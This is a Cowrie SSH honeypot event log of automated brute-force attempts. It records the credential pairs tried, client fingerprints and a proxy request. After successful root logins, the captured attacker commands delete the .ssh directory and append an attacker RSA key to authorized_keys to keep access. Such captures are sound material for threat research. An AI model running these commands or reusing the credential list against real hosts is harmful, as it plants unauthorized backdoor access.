{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T22:51:22.171665Z","src_ip":"176.65.149.186","session":"10577facea00"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T22:51:22.172721Z","src_ip":"176.65.149.186","session":"10577facea00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35102,"dst_ip":"1.2.3.4","dst_port":22,"session":"917fd6e516b0","protocol":"ssh","message":"New connection: 212.227.235.229:35102 (1.2.3.4:22) [session: 917fd6e516b0]","sensor":"my-vps","timestamp":"2025-09-08T22:51:33.260965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:51:33.282793Z","src_ip":"212.227.235.229","session":"917fd6e516b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:51:33.514893Z","src_ip":"212.227.235.229","session":"917fd6e516b0"}
{"eventid":"cowrie.login.failed","username":"debian","password":"Welcome1","message":"login attempt [debian/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:51:34.533921Z","src_ip":"212.227.235.229","session":"917fd6e516b0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:35.778750Z","src_ip":"212.227.235.229","session":"917fd6e516b0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55536,"dst_ip":"1.2.3.4","dst_port":22,"session":"39d7bf349e9d","protocol":"ssh","message":"New connection: 217.72.205.35:55536 (1.2.3.4:22) [session: 39d7bf349e9d]","sensor":"my-vps","timestamp":"2025-09-08T22:51:45.974039Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:45.975171Z","src_ip":"217.72.205.35","session":"39d7bf349e9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23958,"dst_ip":"1.2.3.4","dst_port":22,"session":"b77be443c682","protocol":"ssh","message":"New connection: 212.227.235.229:23958 (1.2.3.4:22) [session: b77be443c682]","sensor":"my-vps","timestamp":"2025-09-08T22:51:56.021473Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:51:56.022954Z","src_ip":"212.227.235.229","session":"b77be443c682"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24256,"dst_ip":"1.2.3.4","dst_port":22,"session":"826b739211be","protocol":"ssh","message":"New connection: 212.227.235.229:24256 (1.2.3.4:22) [session: 826b739211be]","sensor":"my-vps","timestamp":"2025-09-08T22:51:56.151709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:51:56.152781Z","src_ip":"212.227.235.229","session":"826b739211be"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T22:51:56.283666Z","src_ip":"212.227.235.229","session":"826b739211be"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:51:56.674613Z","src_ip":"212.227.235.229","session":"826b739211be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T22:51:56.805246Z","session":"826b739211be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38048,"dst_ip":"1.2.3.4","dst_port":22,"session":"a03578488649","protocol":"ssh","message":"New connection: 212.227.235.229:38048 (1.2.3.4:22) [session: a03578488649]","sensor":"my-vps","timestamp":"2025-09-08T22:52:03.170822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:03.171757Z","src_ip":"212.227.235.229","session":"a03578488649"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:03.271147Z","src_ip":"212.227.235.229","session":"a03578488649"}
{"eventid":"cowrie.login.failed","username":"elk","password":"pass","message":"login attempt [elk/pass] failed","sensor":"my-vps","timestamp":"2025-09-08T22:52:03.714089Z","src_ip":"212.227.235.229","session":"a03578488649"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:04.817183Z","src_ip":"212.227.235.229","session":"a03578488649"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58796,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff69dd53e8cb","protocol":"ssh","message":"New connection: 212.227.235.229:58796 (1.2.3.4:22) [session: ff69dd53e8cb]","sensor":"my-vps","timestamp":"2025-09-08T22:52:11.438711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:11.439362Z","src_ip":"212.227.235.229","session":"ff69dd53e8cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:11.672850Z","src_ip":"212.227.235.229","session":"ff69dd53e8cb"}
{"eventid":"cowrie.login.failed","username":"a","password":"Password1","message":"login attempt [a/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:52:12.647311Z","src_ip":"212.227.235.229","session":"ff69dd53e8cb"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:13.883787Z","src_ip":"212.227.235.229","session":"ff69dd53e8cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35376,"dst_ip":"1.2.3.4","dst_port":22,"session":"0024f2ca6cd8","protocol":"ssh","message":"New connection: 212.227.235.229:35376 (1.2.3.4:22) [session: 0024f2ca6cd8]","sensor":"my-vps","timestamp":"2025-09-08T22:52:17.476647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:17.478229Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:17.798858Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.login.success","username":"root","password":"3edc$RFV","message":"login attempt [root/3edc$RFV] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:52:19.124253Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:52:19.781880Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:52:19.782618Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:52:19.783983Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:20.107156Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:52:20.863605Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:52:20.864326Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:52:21.187529Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:21.188431Z","src_ip":"212.227.235.229","session":"0024f2ca6cd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33732,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d81f53eede6","protocol":"ssh","message":"New connection: 212.227.235.229:33732 (1.2.3.4:22) [session: 8d81f53eede6]","sensor":"my-vps","timestamp":"2025-09-08T22:52:21.328010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:21.328776Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36786,"dst_ip":"1.2.3.4","dst_port":22,"session":"16b9dffb5f4f","protocol":"ssh","message":"New connection: 212.227.235.229:36786 (1.2.3.4:22) [session: 16b9dffb5f4f]","sensor":"my-vps","timestamp":"2025-09-08T22:52:21.505185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:21.506218Z","src_ip":"212.227.235.229","session":"16b9dffb5f4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:21.640387Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:52:21.825845Z","src_ip":"212.227.235.229","session":"16b9dffb5f4f"}
{"eventid":"cowrie.login.success","username":"root","password":"123456xx","message":"login attempt [root/123456xx] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:52:22.928916Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:52:23.143679Z","src_ip":"212.227.235.229","session":"16b9dffb5f4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:52:23.640634Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:52:23.641417Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:52:23.642570Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:23.956092Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:52:24.465363Z","src_ip":"212.227.235.229","session":"16b9dffb5f4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:52:24.599569Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:52:24.600340Z","src_ip":"212.227.235.229","session":"8d81f53eede6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38088,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6ef3885da75","protocol":"ssh","message":"New connection: 212.227.235.229:38088 (1.2.3.4:22) [session: d6ef3885da75]","sensor":"my-vps","timestamp":"2025-09-08T22:52:24.789838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:52:24.791143Z","src_ip":"212.227.235.229","session":"d6ef3885da75"}
